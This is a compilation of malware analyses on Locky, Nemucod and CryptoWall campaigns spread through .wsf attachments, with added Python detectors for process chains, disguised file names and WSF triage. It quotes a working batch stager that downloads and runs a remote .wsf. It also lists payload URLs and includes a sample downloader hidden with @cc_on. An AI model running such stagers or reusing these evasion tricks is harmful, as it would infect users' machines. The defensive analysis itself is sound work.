Notes on how malware and ransomware campaigns have come to abuse .wsf files, collected from the following write-ups:

https://malwarebreakdown.com/2016/09/03/malspam-contains-zip-with-wsf-and-drops-locky/
https://malwarebreakdown.com/2016/09/03/malspam-contains-zipd-wsf-that-retrieves-locky/
https://blog.cloudmark.com/2016/07/18/locky-actors-shift-to-wsf-attachments/
https://blogs.forcepoint.com/security-labs/cerber-actor-distributing-malware-over-e-mail-wsf-files


WSF is a Windows Script File.

“WSF files are designed to allow a mix of scripting languages within a single file, and are opened and run by the Windows Script Host (WSH).”

The following is an example of a site pushing an Installer.zip download. The scamming site is: http://webtrafficsuccess.xyz/gateway.php?target=4b0b95d8142
The archive contains:
a file named installer.bat, 2,014 bytes
2 folders, named data and lang

Within the data folder there is a file setup.dat, 196,662 bytes.

Within the lang folder there are 10 files with an .ini extension, claiming to be language files for Turkish, Spanish, Romanian, Italian, Greek, German, French, English, Danish and Czech. All ten have the same size, 6,615 bytes.
Each one starts with the PNG signature (‰PNG, then an IHDR chunk followed by sRGB, gAMA and pHYs chunks) and ends with the PNG IEND chunk, so despite the .ini extension they are PNG images, not configuration files.

The installer.bat file consists of the following script:
@ECHO OFF
ECHO Downloading the update files, please wait..
IF NOT EXIST %TEMP%\sys00.wsf powershell.exe -ExecutionPolicy bypass -noprofile (New-Object System.Net.WebClient).DownloadFile('http://trafficreactor.club/download.php?c=IMDB','%TEMP%\sys00.wsf');
START %TEMP%\sys00.wsf
CLS
REM ##################
(the REM line is repeated 72 times; it is comment padding and does nothing)

So the batch file is only a stager: PowerShell is started with the execution policy bypassed and without a profile, fetches sys00.wsf into %TEMP%, and START hands the .wsf to the Windows Script Host (wscript.exe) through the file association. The .wsf itself is not in the archive, which is why the archive contains nothing that looks like a script payload.
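The chain above (cmd.exe running a .bat, a sibling powershell.exe that downloads with the execution policy bypassed, then wscript.exe launched on a .wsf in %TEMP%) is easy to spot in process-creation telemetry. The following is an added example, not code from the page or from any of the write-ups it collects: it scores constructed process-creation events modelled on that chain. The event fields (pid, ppid, image, cmdline) and the Sysmon-style shape of the records are assumptions about your log pipeline, and the paths and PIDs are made up.

```python
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    """One process-creation record (Sysmon Event ID 1 style; field names are an assumption)."""
    pid: int
    ppid: int
    image: str      # full path of the new process
    cmdline: str    # its command line


SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
SCRIPT_FILE = re.compile(r"\.(wsf|js|jse|vbs|vbe|wsh)\b", re.I)
USER_WRITABLE = re.compile(r"\\(temp|appdata|downloads|public)\\", re.I)
PS_DOWNLOAD = re.compile(r"DownloadFile|DownloadString|Invoke-WebRequest|Invoke-Expression|\bIEX\b", re.I)
PS_WEAKEN = re.compile(r"-(executionpolicy|ep|ex)\s+bypass|-nop(rofile)?\b", re.I)


def _name(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def chain_findings(events):
    """Return {pid: [reasons]} for script-host launches that resemble installer.bat."""
    by_pid = {e.pid: e for e in events}
    findings = {}
    for e in events:
        if _name(e.image) not in SCRIPT_HOSTS:
            continue
        reasons = []
        if SCRIPT_FILE.search(e.cmdline) and USER_WRITABLE.search(e.cmdline):
            reasons.append("script host runs a script from a user-writable directory")
        parent = by_pid.get(e.ppid)
        if parent and _name(parent.image) == "cmd.exe" and re.search(r"\.(bat|cmd)\b", parent.cmdline, re.I):
            reasons.append("parent cmd.exe is running a batch file")
        # The PowerShell download and the START of the .wsf are children of the same cmd.exe,
        # so the downloader shows up as a sibling of the script host, not as its parent.
        for sib in events:
            if sib.pid != e.pid and sib.ppid == e.ppid and _name(sib.image) == "powershell.exe":
                if PS_DOWNLOAD.search(sib.cmdline):
                    reasons.append("sibling powershell.exe fetched content from the network")
                if PS_WEAKEN.search(sib.cmdline):
                    reasons.append("sibling powershell.exe ran with -ExecutionPolicy bypass or -noprofile")
        if reasons:
            findings[e.pid] = reasons
    return findings


def severity(reasons):
    return "high" if len(reasons) >= 3 else "medium" if len(reasons) == 2 else "low"


# Constructed telemetry for the chain above plus one benign script-host launch.
TEMP = r"C:\Users\alice\AppData\Local\Temp"
SAMPLE_EVENTS = [
    ProcEvent(100, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(200, 100, r"C:\Windows\System32\cmd.exe",
              r'cmd.exe /c "C:\Users\alice\Downloads\Installer\installer.bat"'),
    ProcEvent(300, 200, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -ExecutionPolicy bypass -noprofile (New-Object System.Net.WebClient)"
              ".DownloadFile('http://trafficreactor.club/download.php?c=IMDB','" + TEMP + r"\sys00.wsf');"),
    ProcEvent(400, 200, r"C:\Windows\System32\wscript.exe",
              '"C:\\Windows\\System32\\WScript.exe" "' + TEMP + r'\sys00.wsf"'),
    ProcEvent(500, 100, r"C:\Windows\System32\cscript.exe",
              r"cscript.exe C:\Windows\System32\slmgr.vbs /dli"),   # an admin checking licensing
]

if __name__ == "__main__":
    for pid, reasons in chain_findings(SAMPLE_EVENTS).items():
        print(pid, severity(reasons), reasons)
```

Only the wscript.exe launch from %TEMP% is reported; the cscript.exe run of slmgr.vbs from System32 under explorer.exe collects no reasons. Looking at siblings rather than only the parent matters here because the batch file, not PowerShell, is what starts the script host.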


https://sentinelone.com/blogs/wsf-files-rise/
WSF Files On The Rise
By SentinelOne, November 30, 2016

Like many scripting and development languages, Windows script files (WSF) can be a powerful tool when used for good. In an attacker's hands, the same features are used to write malicious WSF files that download and install malware. One example of this is the recent proliferation of "Locky".

Locky Is Spreading

Millions of spam emails have been sent to spread the Locky ransomware. Back in October, 1.3 million emails were sent with the subject “Travel Itinerary.” These emails contained a WSF attachment within a zip archive.

In another example, a similar email was sent with “complaint letter” as the subject. In this case, the email was said to come from a client and contain the text “regarding the data file you provided.”

A third example of an attack was a fictitious notification about a series of “suspicious bank operations” that was detected by an account manager with the US Office of Personnel Management.

“Dear [NAME], Carole from the bank notified us about the suspicious movements on our account. Examine the attached scanned record. If you need more information, feel free to contact me.”

In this case, the Locky ransomware is impersonating an OPM representative and targeting government contractors who potentially had their information stolen.

With each of these examples, if the zip archive was opened and the file successfully ran, it installed the Locky ransomware on the computer. After installation, the malware encrypts the files on the machine.

Why Did They Use A WSF File To Spread Malware?

Many email clients automatically block a standard executable (.exe) file. However, in some cases, they will allow a WSF file to be downloaded and run. This allows the script to get around the internal security built into many email programs. Another factor is while many users have been told not to download and run executable files, they’re not familiar with the WSF extension and are therefore more likely to run it.

Exploits Are Constantly Changing

It’s a common practice to change the format of attachments within spam campaigns in an attempt to stay ahead of the security vendors. For example, the Locky ransomware has been seen with both WSF and JavaScript attachments. So far, at least 10 different downloader variants have been found.

How To Protect Your Business From Ransomware Like Locky

Protecting your business from ransomware involves the following:

Use up-to-date endpoint protection software
Back up your files so that if your machine becomes infected with ransomware it can be restored
Make sure your operating system is kept up-to-date
Provide proper training for employees on malware
This includes being wary of any attachment they are not expecting from a person.
Even if they know the sender and receive an attachment they weren't expecting, have them phone the sender and ask whether they really sent it.
Make your employees aware that attacks can come from a variety of attachment types (including some not listed here) and they should be cautious before opening any attachment.

Conclusion

The creators of ransomware are getting more creative every day and are highly motivated by a possible payday. Improving education about the potential dangers, backing up your files, and making sure your endpoint security protection is up-to-date are some of the best ways to reduce the risk.


spam emails https://sentinelone.com/blogs/phishing-how-can-we-stop-falling-for-the-oldest-trick-in-the-book/



Ransomware delivered using .wsf (Windows Script File)
Kevin Beaumont, Jan 21, 2016
InfoSec, from the trenches of reality.
kevin.beaumont@gmail.com, @gossithedog

The emails vary, but look something like this:

The zip file contains a file called MESSAGE_123123123123.doc (lots of spaces).wsf:

.wsf is Windows Script File, and is executed by Windows as full blown executable VBScript. In testing some mail filtering doesn't block .wsf by default - Exchange and Outlook will also just pass it through to the user. This one has a real shot at getting to your users via email unless you change some configuration defaults.

The string highlighted above is encrypted VBE, surrounded by random words for IDS evasion. It works really well - not one AV provider or IDS system we tried flagged it.

I decrypted the VBE code:

As you can see, it grabs kb37893902w.exe from updatesarecoming1000.space. When investigations started just one AV provider detected the payload under Heuristics. I also manually detonated the payload with various AV providers with heuristics, cloud markers etc enabled - nothing spotted it. Unsurprisingly, it is crypted.

The payload posts to the following sites (a further list is later).

It also, curiously, removes local admin rights for the user. It’s a ransomware:

“Congratulations! You have become part of large community #CryptoWall.”

It also attempts to contact http://www.petroinform.net, however the author made a coding mistake and the call never completes.

Recommendations
Block .wsf files by default at your email gateway, including when inside ZIP files. Your users don’t ever need them.
On the client use AppLocker to restrict random VBScript and .exe from %appdata%

Threat indicators
.wsf email: SHA256 82f25f30b973e899f6feae5e781f02076d31c54e6fd8a0a367e2efef9c76f441
.zip: SHA256 5fcff95bd25a853fd95c2f69801555cf21ea9b022815ce2d392412c2a30043f0

Domains
e-minunat.ro
balustradydrewniane.pl
ahtubafishing.com
lptech.sk
dermalightcr.com
dorisbociort.ro
vladoveverka.sk
inicc.yucatan.gob.mx

Antivirus cover
Sophos later added detection as Troj/Agent-AQAT and Troj/VBSDl-U

not one AV provider https://www.virustotal.com/en/file/82f25f30b973e899f6feae5e781f02076d31c54e6fd8a0a367e2efef9c76f441/analysis/1453417066/
kb37893902w.exe https://www.virustotal.com/en/file/84680ea2cf3a32b95b6e761552f9bdaacacb0fe5469f9b013086232689b8e19c/analysis/


https://blogs.technet.microsoft.com/mmpc/2016/07/23/nemucod/
Nemucod dot dot..WSF
Francis Tan Seng and Alden Pornasdoro
MMPC
msft-mmpc, July 23, 2016

The latest Nemucod campaign shows the malware distributing a spam email attachment with a .wsf extension, specifically ..wsf (with a double dot) extension.

It is a variation of what has been observed since last year (2015) – the TrojanDownloader:JS/Nemucod malware downloader using JScript. It still spreads through spam email attachment, typically inside a .zip file, using a file name of interest with .js or .jse as extension.

The following screenshots show what the malicious file attachment looks like in the recent campaign:

Figure 1: Example of what a spam email carrying the latest version of Nemucod might look like


Figure 2: Example of what the Nemucod attachment looks like when extracted and opened with an archive viewer

What the double dots mean: Social engineering for unsuspecting eyes

As seen in the following file name samples, the double dot paired with the uncommon .wsf extension creates the illusion that the file name was abbreviated, deliberately cut short, or truncated by the system because it was too long:

profile-d39a..wsf
profile-e3de..wsf
profile-e7dc..wsf
profile-f8d..wsf
profile-fb50..wsf
spreadsheet_07a..wsf
spreadsheet_1529..wsf
spreadsheet_2c3b..wsf
spreadsheet_36ff..wsf
spreadsheet_3a8..wsf

Some might look at the sample file names and assume that they might originally have been a long unique string identifier consisting of random letters and numbers that could be a transaction ID, receipt number or even user ID:

profile-d39as1u3e8k9i3m4wsf
profile-e3dee1uwl8s10f3m4wsf
profile-e7dc4d1u3e83m4wsf
profile-f8dsdwsfe8k4i38wsf
profile-fb50s1u3l8k9i3m4wsf
spreadsheet_07as133e3k9i3e4wsf
spreadsheet_1529s15se8f9i3o6wsf
spreadsheet_2c3bs1u5dfk9i3m6wsf
spreadsheet_36ffs1ure8koei3d5ws
spreadsheet_3a8s1udwsf8s9i323wsf

However, this is not the case. These are script files that might contain malicious code which could harm your system.
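Both the "MESSAGE_....doc (lots of spaces).wsf" name in the Beaumont post above and the "..wsf" names listed here are attacks on how a file name is displayed, and both posts recommend blocking .wsf at the mail gateway, including inside ZIP archives. The following is an added example, not code from any of the posts: it generalizes the three tricks on this page (a script-host extension, a double-dot extension, and a decoy document extension padded with whitespace) into a name check, and applies it to every member of an archive, recursing into nested ZIPs. The sample archive and its member names are constructed here for the demonstration.

```python
import io
import re
import zipfile

SCRIPT_EXTS = {"wsf", "js", "jse", "vbs", "vbe", "wsh", "hta"}
DECOY = r"(doc|docx|xls|xlsx|ppt|pptx|pdf|txt|rtf|jpe?g|png)"


def check_name(name):
    """Return the reasons a file name looks like a disguised script (empty list = fine)."""
    base = name.rsplit("/", 1)[-1]            # ZIP member paths use forward slashes
    reasons = []
    m = re.search(r"\.([A-Za-z0-9]+)$", base)
    ext = m.group(1).lower() if m else ""
    if ext in SCRIPT_EXTS:
        reasons.append("script-host extension ." + ext)
    if re.search(r"\.\.[A-Za-z0-9]+$", base):
        reasons.append("double-dot extension, meant to look truncated")
    if re.search(r"\." + DECOY + r"[\s\u00a0]*\.[A-Za-z0-9]+$", base, re.I):
        reasons.append("decoy document extension before the real one")
    if re.search(r"\s{2,}\.[A-Za-z0-9]+$", base):
        reasons.append("whitespace padding pushes the real extension out of view")
    return reasons


def scan_zip(data, prefix="", depth=0):
    """Map every flagged member (nested archives included) to its reasons."""
    flagged = {}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            path = prefix + info.filename
            reasons = check_name(info.filename)
            if reasons:
                flagged[path] = reasons
            if info.filename.lower().endswith(".zip"):
                if depth >= 3:
                    flagged[path] = ["archive nested too deep to inspect"]
                    continue
                try:
                    flagged.update(scan_zip(zf.read(info), path + "/", depth + 1))
                except zipfile.BadZipFile:
                    flagged[path] = ["member claims to be a ZIP but does not parse"]
    return flagged


def should_block(data):
    """Gateway policy from the posts above: a disguised script anywhere in the archive blocks it."""
    return bool(scan_zip(data))


# Constructed sample names modelled on the ones quoted on this page.
DISGUISED_DOC = "MESSAGE_123123123123.doc" + " " * 40 + ".wsf"
DOUBLE_DOT = "spreadsheet_2c3b..wsf"
DOUBLE_EXT = "invoice.pdf.js"


def build_sample_zip():
    """Build an in-memory archive: three disguised scripts, one harmless file, one nested ZIP."""
    inner = io.BytesIO()
    with zipfile.ZipFile(inner, "w") as zf:
        zf.writestr("profile-d39a..wsf", "<job><script language='JScript'>//</script></job>")
    outer = io.BytesIO()
    with zipfile.ZipFile(outer, "w") as zf:
        zf.writestr(DISGUISED_DOC, "<job/>")
        zf.writestr(DOUBLE_DOT, "<job/>")
        zf.writestr(DOUBLE_EXT, "//")
        zf.writestr("lang/en.ini", "[strings]\nhello=Hello\n")
        zf.writestr("attachments.zip", inner.getvalue())
    return outer.getvalue()


if __name__ == "__main__":
    for member, reasons in scan_zip(build_sample_zip()).items():
        print(repr(member), reasons)
```

The check is deliberately name-only, which is what a gateway can do cheaply before any content inspection; the decision is on the whole archive, since a user will extract everything. A nested archive that fails to parse is flagged rather than ignored, because an unreadable member is exactly what an attacker would send to get past a scanner that skips what it cannot open.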

Underneath the WSF

A Windows Script File is a text document containing Extensible Markup Language (XML). It incorporates several features that offer increased scripting flexibility. Because a WSF is not tied to one script language, the underlying code can be JScript (Microsoft's JavaScript dialect) or VBScript, or both, depending on the language attribute declared on each script element in the file. The WSF acts as a container.

Underneath the WSF is the same typical Nemucod JScript code.


Figure 3: Nemucod code inside WSF: has encrypted code and the decryption is written under @cc_on (conditional compilation)

This Nemucod version leverages @cc_on (conditional compilation). A conditional-compilation block is written inside a JScript comment (/*@cc_on ... @*/), so a scanner that treats it as an ordinary comment never sees the decryption routine, while the JScript engine compiles and runs it. This can evade AV scanners that do not implement conditional compilation, because they never interpret the comment as executable code.
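The two points above (a WSF is an XML container whose script elements declare their language, and @cc_on hides code inside a comment) suggest a simple triage step: enumerate the script blocks and look separately at what is inside conditional-compilation comments. The following is an added example, not code from the MMPC post, and SAMPLE_WSF is a constructed file, not the Nemucod sample; the list of suspicious API names is a starting point, not a signature. It also flags a language ending in .Encode (the Script Encoder output Beaumont decrypted above) and a src attribute that pulls script from elsewhere, and falls back to a regex when the file is not well-formed XML, since WSH is more tolerant of sloppy markup than a strict parser.

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample: a decoy VBScript block and a JScript block whose downloader
# lives inside a /*@cc_on ... @*/ comment.
SAMPLE_WSF = """<?xml version="1.0" ?>
<package>
 <job id="update">
  <script language="VBScript">
   ' decoy block: does nothing useful
   Dim label : label = "Updating..."
  </script>
  <script language="JScript">
   var done = false;
   /*@cc_on
   var sh = new ActiveXObject("WScript.Shell");
   var xh = new ActiveXObject("MSXML2.XMLHTTP");
   xh.open("GET", "http://invalid.example/dl", false);
   @*/
  </script>
 </job>
</package>
"""

# Names a script downloader needs; one alone proves nothing, several together rarely appear in benign WSF.
SUSPICIOUS = ["ActiveXObject", "CreateObject", "WScript.Shell", "MSXML2.XMLHTTP",
              "MSXML2.ServerXMLHTTP", "ADODB.Stream", "Scripting.FileSystemObject",
              ".Run(", "ShellExecute", "eval(", "unescape(", "String.fromCharCode", "Execute("]
# /*@cc_on ... @*/, /*@if ... @end @*/ and /*@set ... @*/ are comments to a plain reader, code to JScript.
CC_BLOCK = re.compile(r"/\*@(?:cc_on|if|set)\b(.*?)@\*/", re.S)
LOOSE_SCRIPT = re.compile(r"<script\b([^>]*)>(.*?)</script>", re.S | re.I)


def _blocks_strict(text):
    root = ET.fromstring(text)
    for job in root.iter("job"):
        for s in job.iter("script"):
            yield job.get("id", ""), s.attrib, s.text or ""


def _blocks_loose(text):
    # WSH tolerates markup that is not well-formed XML; approximate its view with a regex.
    for attrs, body in LOOSE_SCRIPT.findall(text):
        attrib = dict(re.findall(r'(\w+)\s*=\s*"([^"]*)"', attrs))
        yield "", attrib, body


def triage_wsf(text):
    """Describe each script block: language, external source, encoding, hidden code, API names."""
    try:
        blocks = list(_blocks_strict(text))
    except ET.ParseError:
        blocks = list(_blocks_loose(text))
    report = []
    for job_id, attrib, body in blocks:
        lang = attrib.get("language", "")
        hidden = [seg.strip() for seg in CC_BLOCK.findall(body)]
        report.append({
            "job": job_id,
            "language": lang,
            "src": attrib.get("src"),                       # script pulled from another file or URL
            "encoded": lang.lower().endswith(".encode"),    # VBScript.Encode / JScript.Encode
            "cc_on_segments": hidden,
            "suspicious": sorted({t for t in SUSPICIOUS if t in body}),
            "hidden_suspicious": sorted({t for t in SUSPICIOUS if any(t in seg for seg in hidden)}),
        })
    return report


def verdict(report):
    for b in report:
        if b["hidden_suspicious"] or b["encoded"] or b["src"]:
            return "suspicious"
        if len(b["suspicious"]) >= 2:
            return "suspicious"
    return "clean"


if __name__ == "__main__":
    rep = triage_wsf(SAMPLE_WSF)
    for b in rep:
        print(b["language"], b["suspicious"], "hidden:", b["hidden_suspicious"])
    print(verdict(rep))
```

The useful output is not the token list itself but where the tokens sit: a block whose only downloader calls are inside a conditional-compilation comment is the pattern described above, and is worth escalating even when the visible code looks inert.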

Upon code decryption, the following URLs – where the malware payload is being hosted – are revealed:

hxxp://right-livelihoods.org/rpvch
hxxp://nmfabb.com/rgrna1gc
hxxp://www.fabricemontoyo.com/v8li8

Recent spam campaign and trends

The latest Nemucod telemetry for the past 15 days shows that it has constantly been active, although there haven’t been any huge spikes.


Figure 4: Daily detection trend for Nemucod. These are the unique machine encounters per day


Figure 5: Geographic distribution of Nemucod. Data taken from July 3 to July 18,2016

Other than using ..wsf and @cc_on technique, we’ve also seen different and old tricks used as part of its social engineering tactics. This includes, but is not limited to:

Double extension (for example: pdf.js)
Invoice, receipt, and delivery related file names such as DHL, FedEx delivery, and so forth

Nemucod infection chain

Nemucod infection chain showing spam email distributing WSF which downloads and runs malware

Just like the Nemucod campaigns before this, the malware downloader payload includes ransomware, such as:

Ransom:Win32/Locky
Ransom:Win32/Cerber

Mitigation and prevention

To avoid falling prey to this new Nemucod malware campaign:

Use an up-to-date real-time antimalware product, such as Windows Defender for Windows 10.
Ensure that Microsoft Active Protection Service has been enabled.
Use Office 365 Advanced Threat Protection. It has a machine learning capability to help your network administrators block dangerous email threats. See the Overview of Advanced Threat Protection in Exchange: new tools to stop unknown attacks, for details.
Be wary of emails with attachments having .wsf file extensions. It is uncommon and quite suspicious for people to send legitimate applications with such extensions through email. Attachments with “.wsf” extension and, more importantly, double dot extension are more likely to be dubious. Do not click or open these attachments.
Use the AppLocker group policy to prevent dubious software from running. Add .wsf to the file types to block in your AppLocker Group Policy.
Though ransomware and macro-based malware are on the rise, there’s still something that you or your administrators can proactively do:
Ensure that a strong password policy is implemented throughout the enterprise.
Disable the loading of macros in Office programs.
Disable macro loading through the Group Policy settings.
Keep your software up-to-date to mitigate possible software exploits.
Protect derived domain credentials with Credential Guard for Windows 10 Enterprise.
Secure your code integrity with Device Guard for Windows 10 Enterprise.
Secure the lateral account movement in your enterprise.
Use two-factor authentication with Microsoft Passport and Windows Hello.

TrojanDownloader:JS/Nemucod https://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=TrojanDownloader:JS/Nemucod
@cc_on (conditional compilation) https://msdn.microsoft.com/en-us/library/8ka90k2e(v=vs.84).aspx
Ransom:Win32/Locky https://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=Ransom:Win32/Locky
Ransom:Win32/Cerber https://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=Win32/Cerber


https://www.theregister.co.uk/2016/07/25/ms_warns_of_script_worms/
MS warns of ..WSF file worm
Richard Chirgwin, 25 Jul 2016 at 04:33

Microsoft has pulled apart a current malware campaign, and is warning against e-mails with a double-dotted script file attached.

The Nemucod malware isn’t new, but what Redmond discusses in this Technet post is a wrinkle designed to trap unwary eyes: a Windows Script File (wsf) attachment with an extra dot in the file extension – ..wsf instead of .wsf. [See! The headline isn’t a tyop – Ed]

Describing it as “social engineering for unsuspecting eyes”, Microsoft’s post says the attack arrives as a .zip file, and the file list (containing the payload) pops up when viewed in an archive viewer. Microsoft says the double-dotting is probably meant to make someone think it was just a long filename that’s been truncated by the system.

As in past Nemucod campaigns, the payload is designed to install either the Locky or Cerber ransomware. Up-to-date malware protection should be blocking the attack, Microsoft’s post states. ®

this Technet post https://blogs.technet.microsoft.com/mmpc/2016/07/23/nemucod/


https://bestsecuritysearch.com/malicious-wsf-files-zip-archives-malware/
Malicious WSF Files Within ZIP Archives Deliver Malware
Gergana Ivanova
2016-10-13T17:09:24+00:00

Symantec has published observations from the past three months: a major increase in the number of email-based attacks that use malicious Windows Script File (WSF) attachments.

The new tactic is used mainly by ransomware groups. This is not a surprise, as many users are suspicious of emails from unknown sources that contain PDFs, executables or Microsoft Office documents and avoid opening those files, so attackers keep trying new tactics to trick users and their AV software. The researchers have recently blocked a series of new email campaigns that distribute Locky ransomware via malicious WSF files. The company's analysis shows that the malicious WSF files come packed in .ZIP archives. The emails impersonate deliveries from travel agencies, complaint letters, messages from major airlines, etc. Running the WSF file leads to installation of Locky or other malware on the victim's computer.

This is not the first time the crooks have shifted their distribution method; in August we reported that they had started using DLL files in Locky's malicious scheme.

But the recent email attack campaigns that use WSF attachments are not only observed for Locky distributions. The number of blocked emails containing malicious WSF attachments increased from 22 000 in June to more than 2.2 million in September.


Image Source: Symantec, “Number of blocked emails containing malicious WSF attachments by month”

Why Windows Script Host (WSH) Files?

Researchers explain:
“WSF files are designed to allow a mix of scripting languages within a single file, and are opened and run by the Windows Script Host (WSH).”

It is likely that users have not configured their email services to block files with a .wsf extension, so the attachment runs with the effect of an executable as soon as it is opened. The change of file type can also slip past AV software whose vendors have not tuned their defenses for this type, so the attack gets through and the infection starts without any alert that something is wrong once the .wsf file is opened.

Yet another reason for choosing WSF files could be that this file type is rarely seen by most users, so they are curious to see what opens and do not expect any risk in running the file.

In Conclusion..

Note from the researchers:
“In a constantly shifting threat landscape, organizations need to remain vigilant and aware that threats can come from new and unanticipated sources.”

